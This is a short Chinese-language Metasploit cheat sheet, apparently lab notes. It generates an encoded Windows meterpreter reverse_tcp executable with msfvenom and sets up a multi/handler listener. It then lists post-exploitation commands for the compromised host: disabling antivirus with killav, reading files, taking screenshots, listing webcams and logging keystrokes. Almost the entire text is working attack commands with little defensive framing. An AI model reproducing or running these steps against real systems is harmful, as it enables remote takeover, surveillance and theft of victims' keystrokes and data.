生成shell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.88 lport=10105 -i 5 -f exe -o /root/windows_shell.exe
msfvenom参数
-p payload
-lhost 本机ip
-lport 监听的端口
-i 次数
-o 保存
-f 编译
-e 编码
把它放到桌面
然后用msf监听端口 --开启msf
msfconsole
use exploit/multi/handler --使用监听模块
use exploit/multi/handler
show options --查看输入的可选项
show options
设置payload--和生成shell参数设置一致
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.159.88 --kali地址
set lhost 192.168.159.88
set lport 10105 --shell接受端口
set lport 10105
run --运行,开启监听
run
监听成功
系统命令
查看版本
命令
sysinfo
查看当前账户
getuid
查看当前处于本地的哪个目录:
getlwd
查看是否运行在虚拟机上
run post/windows/gather/checkvm
查看运行时间
idletime
关闭杀毒软件:run killav
run killav
查看当前属于目标机的工作目录的路径名称:pwd
pwd
列出当前目录的所有文件:ls
ls
查看目标1.txt文件内内容:
cat 1.txt
拍照桌面
screenshot
寻找摄像头
webcam_list
杀死进程 进程的PID
kill 进程的PID
记录键盘
keyscan_start
输出
keyscan dump
退出监听
输入background可以暂时退出监听页面,然后sessions可以查看进度然后 session+数字就可回到进度